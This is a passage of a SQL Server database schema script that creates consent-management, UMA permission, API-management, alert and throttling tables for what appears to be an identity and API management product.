CM_PII_CATEGORY_ID INTEGER NOT NULL,
IS_MANDATORY INTEGER NOT NULL,
CONSTRAINT CM_PURPOSE_PII_CAT_ASSOC_CNT UNIQUE (PURPOSE_ID, CM_PII_CATEGORY_ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_SP_PURPOSE_PII_CAT_ASSOC]') AND TYPE IN (N'U'))
CREATE TABLE CM_SP_PURPOSE_PII_CAT_ASSOC (
SP_PURPOSE_ASSOC_ID INTEGER NOT NULL,
PII_CATEGORY_ID INTEGER NOT NULL,
VALIDITY VARCHAR(1023),
CONSTRAINT CM_SP_PURPOSE_PII_CAT_ASSOC_CNT UNIQUE (SP_PURPOSE_ASSOC_ID, PII_CATEGORY_ID),
FOREIGN KEY (PII_CATEGORY_ID) REFERENCES CM_PII_CATEGORY (ID),
FOREIGN KEY (SP_PURPOSE_ASSOC_ID) REFERENCES CM_SP_PURPOSE_ASSOC (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[CM_CONSENT_RECEIPT_PROPERTY]') AND TYPE IN (N'U'))
CREATE TABLE CM_CONSENT_RECEIPT_PROPERTY (
CONSENT_RECEIPT_ID VARCHAR(255) NOT NULL,
NAME VARCHAR(255) NOT NULL,
VALUE VARCHAR(1023) NOT NULL,
CONSTRAINT CM_CONSENT_RECEIPT_PROPERTY_CNT UNIQUE (CONSENT_RECEIPT_ID, NAME),
FOREIGN KEY (CONSENT_RECEIPT_ID) REFERENCES CM_RECEIPT (CONSENT_RECEIPT_ID)
);
INSERT INTO CM_PURPOSE (NAME, DESCRIPTION, PURPOSE_GROUP, GROUP_TYPE, TENANT_ID) VALUES ('DEFAULT', 'For core functionalities of the product', 'DEFAULT', 'SP', '-1234');
INSERT INTO CM_PURPOSE_CATEGORY (NAME, DESCRIPTION, TENANT_ID) VALUES ('DEFAULT','For core functionalities of the product', '-1234');
-- End of CONSENT-MGT Tables --
-- UMA tables --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_UMA_RESOURCE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_UMA_RESOURCE (
ID INTEGER IDENTITY NOT NULL,
RESOURCE_ID VARCHAR(255),
RESOURCE_NAME VARCHAR(255),
TIME_CREATED DATETIME NOT NULL,
RESOURCE_OWNER_NAME VARCHAR(255),
CLIENT_ID VARCHAR(255),
TENANT_ID INTEGER DEFAULT -1234,
USER_DOMAIN VARCHAR(50),
PRIMARY KEY (ID)
);
CREATE INDEX IDX_RID ON IDN_UMA_RESOURCE (RESOURCE_ID);
CREATE INDEX IDX_USER ON IDN_UMA_RESOURCE (RESOURCE_OWNER_NAME, USER_DOMAIN);
CREATE INDEX IDX_USER_RID ON IDN_UMA_RESOURCE (RESOURCE_ID, RESOURCE_OWNER_NAME, USER_DOMAIN, CLIENT_ID);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_UMA_RESOURCE_META_DATA]') AND TYPE IN (N'U'))
CREATE TABLE IDN_UMA_RESOURCE_META_DATA (
ID INTEGER IDENTITY NOT NULL,
RESOURCE_IDENTITY INTEGER NOT NULL,
PROPERTY_KEY VARCHAR(40),
PROPERTY_VALUE VARCHAR(255),
PRIMARY KEY (ID),
FOREIGN KEY (RESOURCE_IDENTITY) REFERENCES IDN_UMA_RESOURCE (ID) ON DELETE CASCADE
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_UMA_RESOURCE_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_UMA_RESOURCE_SCOPE (
ID INTEGER IDENTITY NOT NULL,
RESOURCE_IDENTITY INTEGER NOT NULL,
SCOPE_NAME VARCHAR(255),
PRIMARY KEY (ID),
FOREIGN KEY (RESOURCE_IDENTITY) REFERENCES IDN_UMA_RESOURCE (ID) ON DELETE CASCADE
);
CREATE INDEX IDX_RS ON IDN_UMA_RESOURCE_SCOPE (SCOPE_NAME);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_UMA_PERMISSION_TICKET]') AND TYPE IN (N'U'))
CREATE TABLE IDN_UMA_PERMISSION_TICKET (
ID INTEGER IDENTITY NOT NULL,
PT VARCHAR(255) NOT NULL,
TIME_CREATED DATETIME NOT NULL,
EXPIRY_TIME DATETIME NOT NULL,
TICKET_STATE VARCHAR(25) DEFAULT 'ACTIVE',
TENANT_ID INTEGER DEFAULT -1234,
TOKEN_ID VARCHAR(255),
PRIMARY KEY (ID)
);
CREATE INDEX IDX_PT ON IDN_UMA_PERMISSION_TICKET (PT);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_UMA_PT_RESOURCE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_UMA_PT_RESOURCE (
ID INTEGER IDENTITY NOT NULL,
PT_RESOURCE_ID INTEGER NOT NULL,
PT_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (PT_ID) REFERENCES IDN_UMA_PERMISSION_TICKET (ID) ON DELETE CASCADE,
FOREIGN KEY (PT_RESOURCE_ID) REFERENCES IDN_UMA_RESOURCE (ID)
);
IF NOT EXISTS ( SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_UMA_PT_RESOURCE_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_UMA_PT_RESOURCE_SCOPE (
ID INTEGER IDENTITY NOT NULL,
PT_RESOURCE_ID INTEGER NOT NULL,
PT_SCOPE_ID INTEGER NOT NULL,
PRIMARY KEY (ID),
FOREIGN KEY (PT_RESOURCE_ID) REFERENCES IDN_UMA_PT_RESOURCE (ID) ON DELETE CASCADE,
FOREIGN KEY (PT_SCOPE_ID) REFERENCES IDN_UMA_RESOURCE_SCOPE (ID)
);
-- Start of API-Mgt Tables --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SUBSCRIBER]') AND TYPE IN (N'U'))
CREATE TABLE AM_SUBSCRIBER (
SUBSCRIBER_ID INTEGER IDENTITY(1,1),
USER_ID VARCHAR(50) NOT NULL,
TENANT_ID INTEGER NOT NULL,
EMAIL_ADDRESS VARCHAR(256) NULL,
DATE_SUBSCRIBED DATETIME NOT NULL,
CREATED_BY VARCHAR(100),
CREATED_TIME DATETIME,
UPDATED_BY VARCHAR(100),
UPDATED_TIME DATETIME,
PRIMARY KEY (SUBSCRIBER_ID),
UNIQUE (TENANT_ID,USER_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APPLICATION]') AND TYPE IN (N'U'))
CREATE TABLE AM_APPLICATION (
APPLICATION_ID INTEGER IDENTITY(1,1),
NAME VARCHAR(100) COLLATE Latin1_General_CS_AS,
SUBSCRIBER_ID INTEGER,
APPLICATION_TIER VARCHAR(50) DEFAULT 'Unlimited',
CALLBACK_URL VARCHAR(512),
DESCRIPTION VARCHAR(512),
APPLICATION_STATUS VARCHAR(50) DEFAULT 'APPROVED',
GROUP_ID VARCHAR(100),
CREATED_BY VARCHAR(100),
CREATED_TIME DATETIME,
UPDATED_BY VARCHAR(100),
UPDATED_TIME DATETIME,
UUID VARCHAR(256),
TOKEN_TYPE VARCHAR(10),
FOREIGN KEY(SUBSCRIBER_ID) REFERENCES AM_SUBSCRIBER(SUBSCRIBER_ID) ON UPDATE CASCADE,
PRIMARY KEY(APPLICATION_ID),
UNIQUE (NAME,SUBSCRIBER_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_MONETIZATION_USAGE]') AND TYPE IN (N'U'))
CREATE TABLE AM_MONETIZATION_USAGE (
ID VARCHAR(100) NOT NULL,
STATE VARCHAR(50) NOT NULL,
STATUS VARCHAR(50) NOT NULL,
STARTED_TIME VARCHAR(50) NOT NULL,
PUBLISHED_TIME VARCHAR(50) NOT NULL,
PRIMARY KEY(ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API]') AND TYPE IN (N'U'))
CREATE TABLE AM_API (
API_ID INTEGER IDENTITY(1,1),
API_UUID VARCHAR(256),
API_PROVIDER VARCHAR(200),
API_NAME VARCHAR(200),
API_VERSION VARCHAR(30),
CONTEXT VARCHAR(256),
CONTEXT_TEMPLATE VARCHAR(256),
API_TIER VARCHAR(256),
API_TYPE VARCHAR(10),
CREATED_BY VARCHAR(100),
CREATED_TIME DATETIME,
UPDATED_BY VARCHAR(100),
UPDATED_TIME DATETIME,
STATUS VARCHAR(30),
PRIMARY KEY(API_ID),
UNIQUE (API_PROVIDER,API_NAME,API_VERSION),
UNIQUE (API_UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_GRAPHQL_COMPLEXITY]') AND TYPE IN (N'U'))
CREATE TABLE AM_GRAPHQL_COMPLEXITY (
UUID VARCHAR(256),
API_ID INTEGER NOT NULL,
TYPE VARCHAR(256),
FIELD VARCHAR(256),
COMPLEXITY_VALUE INTEGER,
REVISION_UUID VARCHAR(255),
FOREIGN KEY (API_ID) REFERENCES AM_API(API_ID) ON UPDATE CASCADE ON DELETE CASCADE,
PRIMARY KEY(UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_URL_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_URL_MAPPING (
URL_MAPPING_ID INTEGER IDENTITY(1,1),
API_ID INTEGER NOT NULL,
HTTP_METHOD VARCHAR(20) NULL,
AUTH_SCHEME VARCHAR(50) NULL,
URL_PATTERN VARCHAR(512) NULL,
THROTTLING_TIER varchar(512) DEFAULT NULL,
MEDIATION_SCRIPT VARBINARY(MAX),
REVISION_UUID VARCHAR(255),
PRIMARY KEY (URL_MAPPING_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_RESOURCE_SCOPE_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_RESOURCE_SCOPE_MAPPING (
SCOPE_NAME VARCHAR(255) NOT NULL,
URL_MAPPING_ID INTEGER NOT NULL,
TENANT_ID INTEGER NOT NULL,
FOREIGN KEY (URL_MAPPING_ID) REFERENCES AM_API_URL_MAPPING(URL_MAPPING_ID) ON DELETE CASCADE,
PRIMARY KEY(SCOPE_NAME, URL_MAPPING_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SECURITY_AUDIT_UUID_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_SECURITY_AUDIT_UUID_MAPPING (
API_ID INTEGER NOT NULL,
AUDIT_UUID VARCHAR(255) NOT NULL,
FOREIGN KEY (API_ID) REFERENCES AM_API(API_ID) ON UPDATE CASCADE ON DELETE NO ACTION,
PRIMARY KEY (API_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_PRODUCT_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_PRODUCT_MAPPING (
API_PRODUCT_MAPPING_ID INTEGER IDENTITY(1,1),
API_ID INTEGER,
URL_MAPPING_ID INTEGER,
REVISION_UUID VARCHAR(255),
FOREIGN KEY (API_ID) REFERENCES AM_API(API_ID) ON DELETE CASCADE,
FOREIGN KEY (URL_MAPPING_ID) REFERENCES AM_API_URL_MAPPING(URL_MAPPING_ID) ON DELETE CASCADE,
PRIMARY KEY(API_PRODUCT_MAPPING_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SUBSCRIPTION]') AND TYPE IN (N'U'))
CREATE TABLE AM_SUBSCRIPTION (
SUBSCRIPTION_ID INTEGER IDENTITY(1,1),
TIER_ID VARCHAR(50),
TIER_ID_PENDING VARCHAR(50),
API_ID INTEGER,
LAST_ACCESSED DATETIME NULL,
APPLICATION_ID INTEGER,
SUB_STATUS VARCHAR(50),
SUBS_CREATE_STATE VARCHAR(50) DEFAULT 'SUBSCRIBE',
CREATED_BY VARCHAR(100),
CREATED_TIME DATETIME,
UPDATED_BY VARCHAR(100),
UPDATED_TIME DATETIME,
UUID VARCHAR(256),
FOREIGN KEY(APPLICATION_ID) REFERENCES AM_APPLICATION(APPLICATION_ID) ON UPDATE CASCADE,
FOREIGN KEY(API_ID) REFERENCES AM_API(API_ID) ON UPDATE CASCADE,
PRIMARY KEY (SUBSCRIPTION_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SUBSCRIPTION_KEY_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_SUBSCRIPTION_KEY_MAPPING (
SUBSCRIPTION_ID INTEGER,
ACCESS_TOKEN VARCHAR(512),
KEY_TYPE VARCHAR(512) NOT NULL,
FOREIGN KEY(SUBSCRIPTION_ID) REFERENCES AM_SUBSCRIPTION(SUBSCRIPTION_ID) ON UPDATE CASCADE,
PRIMARY KEY(SUBSCRIPTION_ID,ACCESS_TOKEN)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APPLICATION_KEY_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_APPLICATION_KEY_MAPPING (
UUID VARCHAR(100),
APPLICATION_ID INTEGER,
CONSUMER_KEY VARCHAR(512),
KEY_TYPE VARCHAR(512) NOT NULL,
STATE VARCHAR(30) NOT NULL,
CREATE_MODE VARCHAR(30) DEFAULT 'CREATED',
KEY_MANAGER VARCHAR(100),
APP_INFO VARBINARY(MAX) DEFAULT NULL,
FOREIGN KEY(APPLICATION_ID) REFERENCES AM_APPLICATION(APPLICATION_ID) ON UPDATE CASCADE,
PRIMARY KEY(APPLICATION_ID,KEY_TYPE,KEY_MANAGER)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APPLICATION_REGISTRATION]') AND TYPE IN (N'U'))
CREATE TABLE AM_APPLICATION_REGISTRATION (
REG_ID INTEGER IDENTITY(1,1),
SUBSCRIBER_ID INTEGER,
WF_REF VARCHAR(255) NOT NULL,
APP_ID INTEGER,
TOKEN_TYPE VARCHAR(30),
TOKEN_SCOPE VARCHAR(1500) DEFAULT 'default',
INPUTS VARCHAR(1000),
ALLOWED_DOMAINS VARCHAR(256),
VALIDITY_PERIOD BIGINT,
KEY_MANAGER VARCHAR(255) NOT NULL,
UNIQUE (SUBSCRIBER_ID,APP_ID,TOKEN_TYPE,KEY_MANAGER),
FOREIGN KEY(SUBSCRIBER_ID) REFERENCES AM_SUBSCRIBER(SUBSCRIBER_ID) ON DELETE NO ACTION,
FOREIGN KEY(APP_ID) REFERENCES AM_APPLICATION(APPLICATION_ID) ON UPDATE CASCADE ON DELETE NO ACTION,
PRIMARY KEY (REG_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_LC_EVENT]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_LC_EVENT (
EVENT_ID INTEGER IDENTITY(1,1),
API_ID INTEGER NOT NULL,
PREVIOUS_STATE VARCHAR(50),
NEW_STATE VARCHAR(50) NOT NULL,
USER_ID VARCHAR(50) NOT NULL,
TENANT_ID INTEGER NOT NULL,
EVENT_DATE DATETIME NOT NULL,
FOREIGN KEY(API_ID) REFERENCES AM_API(API_ID) ON UPDATE CASCADE,
PRIMARY KEY (EVENT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APP_KEY_DOMAIN_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_APP_KEY_DOMAIN_MAPPING (
CONSUMER_KEY VARCHAR(512),
AUTHZ_DOMAIN VARCHAR(255) DEFAULT 'ALL',
PRIMARY KEY (CONSUMER_KEY,AUTHZ_DOMAIN)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_COMMENTS]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_COMMENTS (
COMMENT_ID VARCHAR(255) NOT NULL,
COMMENT_TEXT VARCHAR(512),
CREATED_BY VARCHAR(255),
CREATED_TIME DATETIME NOT NULL,
UPDATED_TIME DATETIME DEFAULT NULL,
API_ID INTEGER,
PARENT_COMMENT_ID VARCHAR(255) DEFAULT NULL,
ENTRY_POINT VARCHAR(20),
CATEGORY VARCHAR(20) DEFAULT 'general',
FOREIGN KEY(API_ID) REFERENCES AM_API(API_ID) ON DELETE CASCADE,
FOREIGN KEY(PARENT_COMMENT_ID) REFERENCES AM_API_COMMENTS(COMMENT_ID) ON DELETE CASCADE,
PRIMARY KEY (COMMENT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_RATINGS]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_RATINGS (
RATING_ID VARCHAR(255) NOT NULL,
API_ID INTEGER,
RATING INTEGER,
SUBSCRIBER_ID INTEGER,
FOREIGN KEY(API_ID) REFERENCES AM_API(API_ID) ON UPDATE CASCADE,
FOREIGN KEY(SUBSCRIBER_ID) REFERENCES AM_SUBSCRIBER(SUBSCRIBER_ID) ON UPDATE CASCADE,
PRIMARY KEY (RATING_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_TIER_PERMISSIONS]') AND TYPE IN (N'U'))
CREATE TABLE AM_TIER_PERMISSIONS (
TIER_PERMISSIONS_ID INTEGER IDENTITY(1,1),
TIER VARCHAR(50) NOT NULL,
PERMISSIONS_TYPE VARCHAR(50) NOT NULL,
ROLES VARCHAR(512) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY(TIER_PERMISSIONS_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_EXTERNAL_STORES]') AND TYPE IN (N'U'))
CREATE TABLE AM_EXTERNAL_STORES (
APISTORE_ID INTEGER IDENTITY(1,1),
API_ID INTEGER,
STORE_ID VARCHAR(255) NOT NULL,
STORE_DISPLAY_NAME VARCHAR(255) NOT NULL,
STORE_ENDPOINT VARCHAR(255) NOT NULL,
STORE_TYPE VARCHAR(255) NOT NULL,
LAST_UPDATED_TIME DATETIME,
FOREIGN KEY(API_ID) REFERENCES AM_API(API_ID) ON UPDATE CASCADE,
PRIMARY KEY (APISTORE_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_WORKFLOWS]') AND TYPE IN (N'U'))
CREATE TABLE AM_WORKFLOWS(
WF_ID INTEGER IDENTITY(1,1),
WF_REFERENCE VARCHAR(255) NOT NULL,
WF_TYPE VARCHAR(255) NOT NULL,
WF_STATUS VARCHAR(255) NOT NULL,
WF_CREATED_TIME DATETIME DEFAULT GETDATE(),
WF_UPDATED_TIME DATETIME DEFAULT GETDATE(),
WF_STATUS_DESC VARCHAR(1000),
TENANT_ID INTEGER,
TENANT_DOMAIN VARCHAR(255),
WF_EXTERNAL_REFERENCE VARCHAR(255) NOT NULL UNIQUE,
WF_METADATA VARBINARY(MAX) DEFAULT NULL,
WF_PROPERTIES VARBINARY(MAX) DEFAULT NULL,
PRIMARY KEY (WF_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APPLICATION_REGISTRATION]') AND TYPE IN (N'U'))
CREATE TABLE AM_APPLICATION_REGISTRATION (
REG_ID INTEGER IDENTITY(1,1),
SUBSCRIBER_ID INTEGER,
WF_REF VARCHAR(255) NOT NULL,
APP_ID INTEGER,
TOKEN_TYPE VARCHAR(30),
TOKEN_SCOPE VARCHAR(1500) DEFAULT 'default',
INPUTS VARCHAR(1000),
ALLOWED_DOMAINS VARCHAR(256),
VALIDITY_PERIOD BIGINT,
KEY_MANAGER VARCHAR(255) NOT NULL,
UNIQUE (SUBSCRIBER_ID,APP_ID,TOKEN_TYPE,KEY_MANAGER),
FOREIGN KEY(SUBSCRIBER_ID) REFERENCES AM_SUBSCRIBER(SUBSCRIBER_ID) ON DELETE NO ACTION,
FOREIGN KEY(APP_ID) REFERENCES AM_APPLICATION(APPLICATION_ID) ON UPDATE CASCADE ON DELETE NO ACTION,
PRIMARY KEY (REG_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SHARED_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE AM_SHARED_SCOPE (
NAME VARCHAR(255),
UUID VARCHAR (256),
TENANT_ID INTEGER,
PRIMARY KEY (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_DEFAULT_VERSION]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_DEFAULT_VERSION (
DEFAULT_VERSION_ID INTEGER NOT NULL IDENTITY,
API_NAME VARCHAR(256) NOT NULL ,
API_PROVIDER VARCHAR(256) NOT NULL ,
DEFAULT_API_VERSION VARCHAR(30) ,
PUBLISHED_DEFAULT_API_VERSION VARCHAR(30) ,
PRIMARY KEY (DEFAULT_VERSION_ID)
);
CREATE INDEX IDX_SUB_APP_ID ON AM_SUBSCRIPTION (APPLICATION_ID, SUBSCRIPTION_ID);
CREATE TABLE AM_ALERT_TYPES (
ALERT_TYPE_ID INTEGER NOT NULL IDENTITY,
ALERT_TYPE_NAME VARCHAR(255) NOT NULL ,
STAKE_HOLDER VARCHAR(10) NOT NULL,
PRIMARY KEY (ALERT_TYPE_ID)
);
CREATE TABLE AM_ALERT_TYPES_VALUES (
ALERT_TYPE_ID INTEGER,
USER_NAME VARCHAR(255) NOT NULL ,
STAKE_HOLDER VARCHAR(100) NOT NULL ,
PRIMARY KEY (ALERT_TYPE_ID,USER_NAME,STAKE_HOLDER),
CONSTRAINT AM_ALERT_TYPES_VALUES_CONST UNIQUE (ALERT_TYPE_ID,USER_NAME,STAKE_HOLDER)
);
CREATE TABLE AM_ALERT_EMAILLIST (
EMAIL_LIST_ID INTEGER NOT NULL IDENTITY,
USER_NAME VARCHAR(255) NOT NULL ,
STAKE_HOLDER VARCHAR(100) NOT NULL ,
CONSTRAINT AM_ALERT_EMAILLIST_CONST UNIQUE (EMAIL_LIST_ID,USER_NAME,STAKE_HOLDER),
PRIMARY KEY (EMAIL_LIST_ID)
);
CREATE TABLE AM_ALERT_EMAILLIST_DETAILS (
EMAIL_LIST_ID INTEGER,
EMAIL VARCHAR(255),
PRIMARY KEY (EMAIL_LIST_ID,EMAIL),
CONSTRAINT AM_ALERT_EMAILLIST_DETAILS_CONST UNIQUE (EMAIL_LIST_ID,EMAIL)
);
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('AbnormalResponseTime', 'publisher');
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('AbnormalBackendTime', 'publisher');
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('AbnormalRequestsPerMin', 'subscriber');
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('AbnormalRequestPattern', 'subscriber');
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('UnusualIPAccess', 'subscriber');
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('FrequentTierLimitHitting', 'subscriber');
INSERT INTO AM_ALERT_TYPES (ALERT_TYPE_NAME, STAKE_HOLDER) VALUES ('ApiHealthMonitor', 'publisher');
-- AM Throttling tables --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_POLICY_SUBSCRIPTION]') AND TYPE IN (N'U'))
CREATE TABLE AM_POLICY_SUBSCRIPTION (
POLICY_ID INTEGER IDENTITY(1,1),
NAME VARCHAR(512) NOT NULL,
DISPLAY_NAME VARCHAR(512) NULL DEFAULT NULL,
TENANT_ID INTEGER NOT NULL,
DESCRIPTION VARCHAR(1024) NULL DEFAULT NULL,
QUOTA_TYPE VARCHAR(25) NOT NULL,
QUOTA INTEGER NOT NULL,
QUOTA_UNIT VARCHAR(10) NULL,
UNIT_TIME INTEGER NOT NULL,
TIME_UNIT VARCHAR(25) NOT NULL,
RATE_LIMIT_COUNT INTEGER NULL DEFAULT NULL,
RATE_LIMIT_TIME_UNIT VARCHAR(25) NULL DEFAULT NULL,
IS_DEPLOYED BIT NOT NULL DEFAULT 0,
CUSTOM_ATTRIBUTES VARBINARY(MAX) DEFAULT NULL,
STOP_ON_QUOTA_REACH BIT NOT NULL DEFAULT 0,
BILLING_PLAN VARCHAR(20) NOT NULL,
UUID VARCHAR(256),
MONETIZATION_PLAN VARCHAR(25) NULL DEFAULT NULL,
FIXED_RATE VARCHAR(15) NULL DEFAULT NULL,
BILLING_CYCLE VARCHAR(15) NULL DEFAULT NULL,
PRICE_PER_REQUEST VARCHAR(15) NULL DEFAULT NULL,
CURRENCY VARCHAR(15) NULL DEFAULT NULL,
MAX_COMPLEXITY INTEGER NOT NULL DEFAULT 0,
MAX_DEPTH INTEGER NOT NULL DEFAULT 0,
PRIMARY KEY (POLICY_ID),
UNIQUE (NAME, TENANT_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_POLICY_APPLICATION]') AND TYPE IN (N'U'))
CREATE TABLE AM_POLICY_APPLICATION (
POLICY_ID INTEGER IDENTITY(1,1),
NAME VARCHAR(512) NOT NULL,
DISPLAY_NAME VARCHAR(512) NULL DEFAULT NULL,
TENANT_ID INTEGER NOT NULL,
DESCRIPTION VARCHAR(1024) NULL DEFAULT NULL,
QUOTA_TYPE VARCHAR(25) NOT NULL,
QUOTA INTEGER NOT NULL,
QUOTA_UNIT VARCHAR(10) NULL DEFAULT NULL,
UNIT_TIME INTEGER NOT NULL,
TIME_UNIT VARCHAR(25) NOT NULL,
IS_DEPLOYED BIT NOT NULL DEFAULT 0,
CUSTOM_ATTRIBUTES VARBINARY(MAX) DEFAULT NULL,
UUID VARCHAR(256),
PRIMARY KEY (POLICY_ID),
UNIQUE (NAME, TENANT_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_POLICY_HARD_THROTTLING]') AND TYPE IN (N'U'))
CREATE TABLE AM_POLICY_HARD_THROTTLING (
POLICY_ID INTEGER IDENTITY(1,1),
NAME VARCHAR(512) NOT NULL,
TENANT_ID INTEGER NOT NULL,
DESCRIPTION VARCHAR(1024) NULL DEFAULT NULL,
QUOTA_TYPE VARCHAR(25) NOT NULL,
QUOTA INTEGER NOT NULL,
QUOTA_UNIT VARCHAR(10) NULL DEFAULT NULL,
UNIT_TIME INTEGER NOT NULL,
TIME_UNIT VARCHAR(25) NOT NULL,
IS_DEPLOYED BIT NOT NULL DEFAULT 0,
PRIMARY KEY (POLICY_ID),
UNIQUE (NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_THROTTLE_POLICY]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_THROTTLE_POLICY (
POLICY_ID INTEGER IDENTITY(1,1),
NAME VARCHAR(512) NOT NULL,
DISPLAY_NAME VARCHAR(512) NULL DEFAULT NULL,
TENANT_ID INTEGER NOT NULL,
DESCRIPTION VARCHAR (1024),
DEFAULT_QUOTA_TYPE VARCHAR(25) NOT NULL,
DEFAULT_QUOTA INTEGER NOT NULL,
DEFAULT_QUOTA_UNIT VARCHAR(10) NULL,
DEFAULT_UNIT_TIME INTEGER NOT NULL,
DEFAULT_TIME_UNIT VARCHAR(25) NOT NULL,
APPLICABLE_LEVEL VARCHAR(25) NOT NULL,
IS_DEPLOYED BIT NOT NULL DEFAULT 0,
UUID VARCHAR(256),
PRIMARY KEY (POLICY_ID),
UNIQUE (NAME, TENANT_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_CONDITION_GROUP]') AND TYPE IN (N'U'))
CREATE TABLE AM_CONDITION_GROUP (
CONDITION_GROUP_ID INTEGER IDENTITY(1,1),
POLICY_ID INTEGER NOT NULL,
QUOTA_TYPE VARCHAR(25),
QUOTA INTEGER NOT NULL,
